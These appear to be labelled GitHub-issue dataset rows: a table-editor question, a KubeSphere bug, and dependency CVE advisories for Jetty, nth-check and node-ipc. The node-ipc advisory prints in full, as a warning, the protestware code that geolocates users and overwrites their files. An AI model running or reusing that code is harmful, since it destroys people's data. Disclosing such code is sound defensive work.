Is there any way to keep the `className` in edit mode or pass a `className` to the `<td>` element when cell is in edit mode? | process | columnclassname attr is cleared when customeditor is enabled i noticed that using customeditor attribute of tableheadercolumn when a cell gets into edit mode customeditor is enabled the s classname defined by columnclassname attribute is cleared once the cell isn t being edited anymore the classname is restored jsx tableheadercolumn key column h id columnclassname h celleditor editable td customeditor this formateditor h id h celleditor h label is there any way to keep the classname in edit mode or pass a classname to the element when cell is in edit mode | 1 |
454,462 | 13,101,530,563 | IssuesEvent | 2020-08-04 04:03:35 | kubesphere/kubesphere | https://api.github.com/repos/kubesphere/kubesphere | closed | No image builder shows in project | area/console area/devops kind/bug kind/need-to-verify priority/high |
**Describe the Bug**
Install a minimal env, then enable devops. As we can see devops shows in the ws, but in the project, image builder does not appear.
<img width="1208" alt="Screen Shot 2020-08-03 at 9 13 35 PM" src="https://user-images.githubusercontent.com/28859385/89186540-8637bb00-d5ce-11ea-8b04-5be6f7522880.png">
<img width="1220" alt="Screen Shot 2020-08-03 at 9 13 45 PM" src="https://user-images.githubusercontent.com/28859385/89186553-8d5ec900-d5ce-11ea-9b27-7d5aeddf5154.png">
**Versions Used**
KubeSphere: 3.0.0-dev
| 1.0 | No image builder shows in project -
**Describe the Bug**
Install a minimal env, then enable devops. As we can see devops shows in the ws, but in the project, image builder does not appear.
<img width="1208" alt="Screen Shot 2020-08-03 at 9 13 35 PM" src="https://user-images.githubusercontent.com/28859385/89186540-8637bb00-d5ce-11ea-8b04-5be6f7522880.png">
<img width="1220" alt="Screen Shot 2020-08-03 at 9 13 45 PM" src="https://user-images.githubusercontent.com/28859385/89186553-8d5ec900-d5ce-11ea-9b27-7d5aeddf5154.png">
**Versions Used**
KubeSphere: 3.0.0-dev
| non_process | no image builder shows in project describe the bug install a minimal env then enable devops as we can see devops shows in the ws but in the project image builder does not appear img width alt screen shot at pm src img width alt screen shot at pm src versions used kubesphere dev | 0 |
129,078 | 18,070,797,776 | IssuesEvent | 2021-09-21 02:29:44 | bluelockorg/blue-chat | https://api.github.com/repos/bluelockorg/blue-chat | opened | CVE-2021-3803 (Medium) detected in nth-check-1.0.2.tgz, nth-check-2.0.0.tgz | security vulnerability | ## CVE-2021-3803 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>nth-check-1.0.2.tgz</b>, <b>nth-check-2.0.0.tgz</b></p></summary>
<p>
<details><summary><b>nth-check-1.0.2.tgz</b></p></summary>
<p>performant nth-check parser & compiler</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz">https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- webpack-5.5.0.tgz
- plugin-svgo-5.5.0.tgz
- svgo-1.3.2.tgz
- css-select-2.1.0.tgz
- :x: **nth-check-1.0.2.tgz** (Vulnerable Library)
</details>
<details><summary><b>nth-check-2.0.0.tgz</b></p></summary>
<p>Parses and compiles CSS nth-checks to highly optimized functions.</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz">https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/renderkid/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- html-webpack-plugin-4.5.0.tgz
- pretty-error-2.1.2.tgz
- renderkid-2.0.7.tgz
- css-select-4.1.3.tgz
- :x: **nth-check-2.0.0.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>main</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
nth-check is vulnerable to Inefficient Regular Expression Complexity
<p>Publish Date: 2021-09-17
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-3803>CVE-2021-3803</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: N/A
- Attack Complexity: N/A
- Privileges Required: N/A
- User Interaction: N/A
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1">https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1</a></p>
<p>Release Date: 2021-09-17</p>
<p>Fix Resolution: nth-check - v2.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-3803 (Medium) detected in nth-check-1.0.2.tgz, nth-check-2.0.0.tgz - ## CVE-2021-3803 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>nth-check-1.0.2.tgz</b>, <b>nth-check-2.0.0.tgz</b></p></summary>
<p>
<details><summary><b>nth-check-1.0.2.tgz</b></p></summary>
<p>performant nth-check parser & compiler</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz">https://registry.npmjs.org/nth-check/-/nth-check-1.0.2.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- webpack-5.5.0.tgz
- plugin-svgo-5.5.0.tgz
- svgo-1.3.2.tgz
- css-select-2.1.0.tgz
- :x: **nth-check-1.0.2.tgz** (Vulnerable Library)
</details>
<details><summary><b>nth-check-2.0.0.tgz</b></p></summary>
<p>Parses and compiles CSS nth-checks to highly optimized functions.</p>
<p>Library home page: <a href="https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz">https://registry.npmjs.org/nth-check/-/nth-check-2.0.0.tgz</a></p>
<p>Path to dependency file: blue-chat/package.json</p>
<p>Path to vulnerable library: blue-chat/node_modules/renderkid/node_modules/nth-check/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-4.0.2.tgz (Root Library)
- html-webpack-plugin-4.5.0.tgz
- pretty-error-2.1.2.tgz
- renderkid-2.0.7.tgz
- css-select-4.1.3.tgz
- :x: **nth-check-2.0.0.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>main</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
nth-check is vulnerable to Inefficient Regular Expression Complexity
<p>Publish Date: 2021-09-17
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-3803>CVE-2021-3803</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: N/A
- Attack Complexity: N/A
- Privileges Required: N/A
- User Interaction: N/A
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1">https://github.com/fb55/nth-check/compare/v2.0.0...v2.0.1</a></p>
<p>Release Date: 2021-09-17</p>
<p>Fix Resolution: nth-check - v2.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve medium detected in nth check tgz nth check tgz cve medium severity vulnerability vulnerable libraries nth check tgz nth check tgz nth check tgz performant nth check parser compiler library home page a href path to dependency file blue chat package json path to vulnerable library blue chat node modules nth check package json dependency hierarchy react scripts tgz root library webpack tgz plugin svgo tgz svgo tgz css select tgz x nth check tgz vulnerable library nth check tgz parses and compiles css nth checks to highly optimized functions library home page a href path to dependency file blue chat package json path to vulnerable library blue chat node modules renderkid node modules nth check package json dependency hierarchy react scripts tgz root library html webpack plugin tgz pretty error tgz renderkid tgz css select tgz x nth check tgz vulnerable library found in base branch main vulnerability details nth check is vulnerable to inefficient regular expression complexity publish date url a href cvss score details base score metrics exploitability metrics attack vector n a attack complexity n a privileges required n a user interaction n a scope n a impact metrics confidentiality impact n a integrity impact n a availability impact n a for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution nth check step up your open source security game with whitesource | 0 |
47,732 | 25,162,285,404 | IssuesEvent | 2022-11-10 17:42:55 | eclipse/jetty.project | https://api.github.com/repos/eclipse/jetty.project | closed | `ArrayRetainableByteBufferPool` inefficiently calculates bucket indices | Enhancement Performance | **Jetty version(s)**
10, 11, 12
**Enhancement Description**
The `ArrayRetainableByteBufferPool.bucketFor()` method is on the fast path of every served request, and it delegates its index calculation to a `Function<Integer, Integer>` lambda. This implies boxing and unboxing are happening each time a bucket must be chosen, and this inefficiency started appearing in profiling reports.
This code should be modified so that no boxing/unboxing is done anymore. A simple way would be to replace the `Function<Integer, Integer>` lambda with a custom `IntIntFunction` one for instance. | True | `ArrayRetainableByteBufferPool` inefficiently calculates bucket indices - **Jetty version(s)**
10, 11, 12
**Enhancement Description**
The `ArrayRetainableByteBufferPool.bucketFor()` method is on the fast path of every served request, and it delegates its index calculation to a `Function<Integer, Integer>` lambda. This implies boxing and unboxing are happening each time a bucket must be chosen, and this inefficiency started appearing in profiling reports.
This code should be modified so that no boxing/unboxing is done anymore. A simple way would be to replace the `Function<Integer, Integer>` lambda with a custom `IntIntFunction` one for instance. | non_process | arrayretainablebytebufferpool inefficiently calculates bucket indices jetty version s enhancement description the arrayretainablebytebufferpool bucketfor method is on the fast path of every served request and it delegates its index calculation to a function lambda this implies boxing and unboxing are happening each time a bucket must be chosen and this inefficiency started appearing in profiling reports this code should be modified so that no boxing unboxing is done anymore a simple way would be to replace the function lambda with a custom intintfunction one for instance | 0 |
202,473 | 23,077,324,920 | IssuesEvent | 2022-07-26 01:48:23 | billmcchesney1/flow | https://api.github.com/repos/billmcchesney1/flow | opened | CVE-2022-2047 (Low) detected in multiple libraries | security vulnerability | ## CVE-2022-2047 - Low Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>jetty-client-9.4.33.v20201020.jar</b>, <b>jetty-server-9.4.33.v20201020.jar</b>, <b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>
<details><summary><b>jetty-client-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-client/9.4.33.v20201020/jetty-client-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- websocket-server-9.4.33.v20201020.jar (Root Library)
- websocket-client-9.4.33.v20201020.jar
- :x: **jetty-client-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-server-9.4.33.v20201020.jar</b></p></summary>
<p>The core jetty server artifact.</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /canner/.m2/repository/org/eclipse/jetty/jetty-server/9.4.33.v20201020/jetty-server-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- :x: **jetty-server-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-http/9.4.33.v20201020/jetty-http-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- jetty-server-9.4.33.v20201020.jar (Root Library)
- :x: **jetty-http-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<p>Found in HEAD commit: <a href="https://github.com/billmcchesney1/flow/commit/eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70">eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/low_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
In Eclipse Jetty versions 9.4.0 thru 9.4.46, and 10.0.0 thru 10.0.9, and 11.0.0 thru 11.0.9 versions, the parsing of the authority segment of an http scheme URI, the Jetty HttpURI class improperly detects an invalid input as a hostname. This can lead to failures in a Proxy scenario.
<p>Publish Date: 2022-07-07
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-2047>CVE-2022-2047</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>2.7</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q">https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q</a></p>
<p>Release Date: 2022-07-07</p>
<p>Fix Resolution (org.eclipse.jetty:jetty-http): 10.0.0-alpha0</p>
<p>Direct dependency fix Resolution (org.eclipse.jetty:jetty-server): 9.4.44.v20210927</p>
</p>
</details>
<p></p>
***
<!-- REMEDIATE-OPEN-PR-START -->
- [ ] Check this box to open an automated fix PR
<!-- REMEDIATE-OPEN-PR-END -->
| True | CVE-2022-2047 (Low) detected in multiple libraries - ## CVE-2022-2047 - Low Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>jetty-client-9.4.33.v20201020.jar</b>, <b>jetty-server-9.4.33.v20201020.jar</b>, <b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>
<details><summary><b>jetty-client-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-client/9.4.33.v20201020/jetty-client-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- websocket-server-9.4.33.v20201020.jar (Root Library)
- websocket-client-9.4.33.v20201020.jar
- :x: **jetty-client-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-server-9.4.33.v20201020.jar</b></p></summary>
<p>The core jetty server artifact.</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /canner/.m2/repository/org/eclipse/jetty/jetty-server/9.4.33.v20201020/jetty-server-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- :x: **jetty-server-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<details><summary><b>jetty-http-9.4.33.v20201020.jar</b></p></summary>
<p>The Eclipse Jetty Project</p>
<p>Library home page: <a href="https://eclipse.org/jetty">https://eclipse.org/jetty</a></p>
<p>Path to dependency file: /pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/eclipse/jetty/jetty-http/9.4.33.v20201020/jetty-http-9.4.33.v20201020.jar</p>
<p>
Dependency Hierarchy:
- jetty-server-9.4.33.v20201020.jar (Root Library)
- :x: **jetty-http-9.4.33.v20201020.jar** (Vulnerable Library)
</details>
<p>Found in HEAD commit: <a href="https://github.com/billmcchesney1/flow/commit/eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70">eb687271afab9d7c61ca82fce2ed4fdb3d5e1a70</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/low_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
In Eclipse Jetty versions 9.4.0 thru 9.4.46, and 10.0.0 thru 10.0.9, and 11.0.0 thru 11.0.9 versions, the parsing of the authority segment of an http scheme URI, the Jetty HttpURI class improperly detects an invalid input as a hostname. This can lead to failures in a Proxy scenario.
<p>Publish Date: 2022-07-07
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-2047>CVE-2022-2047</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>2.7</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q">https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q</a></p>
<p>Release Date: 2022-07-07</p>
<p>Fix Resolution (org.eclipse.jetty:jetty-http): 10.0.0-alpha0</p>
<p>Direct dependency fix Resolution (org.eclipse.jetty:jetty-server): 9.4.44.v20210927</p>
</p>
</details>
<p></p>
***
<!-- REMEDIATE-OPEN-PR-START -->
- [ ] Check this box to open an automated fix PR
<!-- REMEDIATE-OPEN-PR-END -->
| non_process | cve low detected in multiple libraries cve low severity vulnerability vulnerable libraries jetty client jar jetty server jar jetty http jar jetty client jar the eclipse jetty project library home page a href path to dependency file pom xml path to vulnerable library home wss scanner repository org eclipse jetty jetty client jetty client jar dependency hierarchy websocket server jar root library websocket client jar x jetty client jar vulnerable library jetty server jar the core jetty server artifact library home page a href path to dependency file pom xml path to vulnerable library canner repository org eclipse jetty jetty server jetty server jar dependency hierarchy x jetty server jar vulnerable library jetty http jar the eclipse jetty project library home page a href path to dependency file pom xml path to vulnerable library home wss scanner repository org eclipse jetty jetty http jetty http jar dependency hierarchy jetty server jar root library x jetty http jar vulnerable library found in head commit a href found in base branch master vulnerability details in eclipse jetty versions thru and thru and thru versions the parsing of the authority segment of an http scheme uri the jetty httpuri class improperly detects an invalid input as a hostname this can lead to failures in a proxy scenario publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required high user interaction none scope unchanged impact metrics confidentiality impact none integrity impact low availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution org eclipse jetty jetty http direct dependency fix resolution org eclipse jetty jetty server check this box to open an automated fix pr | 0 |
168,661 | 20,790,512,403 | IssuesEvent | 2022-03-17 01:04:32 | andrewguest/cookiecutter-fullstack-fastapi-postgresql | https://api.github.com/repos/andrewguest/cookiecutter-fullstack-fastapi-postgresql | opened | CVE-2022-23812 (High) detected in node-ipc-9.2.2.tgz | security vulnerability | ## CVE-2022-23812 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>node-ipc-9.2.2.tgz</b></p></summary>
<p>A nodejs module for local and remote Inter Process Communication (IPC), Neural Networking, and able to facilitate machine learning.</p>
<p>Library home page: <a href="https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz">https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz</a></p>
<p>Path to dependency file: /{{cookiecutter.project_slug}}/frontend/package.json</p>
<p>Path to vulnerable library: /{{cookiecutter.project_slug}}/frontend/node_modules/node-ipc/package.json</p>
<p>
Dependency Hierarchy:
- cli-plugin-babel-4.5.15.tgz (Root Library)
- cli-shared-utils-4.5.15.tgz
- :x: **node-ipc-9.2.2.tgz** (Vulnerable Library)
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
This affects the package node-ipc from 10.1.1 and before 10.1.3.
This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.
**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.
Malicious Code:
**Note:** Don't run it!
js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ??
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
<p>Publish Date: 2022-03-16
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-23812>CVE-2022-23812</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2022-23812 (High) detected in node-ipc-9.2.2.tgz - ## CVE-2022-23812 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>node-ipc-9.2.2.tgz</b></p></summary>
<p>A nodejs module for local and remote Inter Process Communication (IPC), Neural Networking, and able to facilitate machine learning.</p>
<p>Library home page: <a href="https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz">https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz</a></p>
<p>Path to dependency file: /{{cookiecutter.project_slug}}/frontend/package.json</p>
<p>Path to vulnerable library: /{{cookiecutter.project_slug}}/frontend/node_modules/node-ipc/package.json</p>
<p>
Dependency Hierarchy:
- cli-plugin-babel-4.5.15.tgz (Root Library)
- cli-shared-utils-4.5.15.tgz
- :x: **node-ipc-9.2.2.tgz** (Vulnerable Library)
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
This affects the package node-ipc from 10.1.1 and before 10.1.3.
This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.
**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.
Malicious Code:
**Note:** Don't run it!
js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ??
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
<p>Publish Date: 2022-03-16
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-23812>CVE-2022-23812</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve high detected in node ipc tgz cve high severity vulnerability vulnerable library node ipc tgz a nodejs module for local and remote inter process communication ipc neural networking and able to facilitate machine learning library home page a href path to dependency file cookiecutter project slug frontend package json path to vulnerable library cookiecutter project slug frontend node modules node ipc package json dependency hierarchy cli plugin babel tgz root library cli shared utils tgz x node ipc tgz vulnerable library found in base branch master vulnerability details this affects the package node ipc from and before this package contains malicious code that targets users with ip located in russia or belarus and overwrites their files with a heart emoji note from versions onwards instead of having malicious code directly in the source of this package node ipc imports the peacenotwar package that includes potentially undesired behavior malicious code note don t run it js import u from path import a from fs import o from https settimeout function const t math round math random if t return const n buffer from o get n tostring function t t on data function t const n buffer from const o buffer from const r buffer from const f buffer from lw const c buffer from const e buffer from const i buffer from try const s json parse t tostring const u s tolowercase const a u includes e tostring u includes i tostring checks if country is russia or belarus if a h n tostring h o tostring h r tostring h f tostring 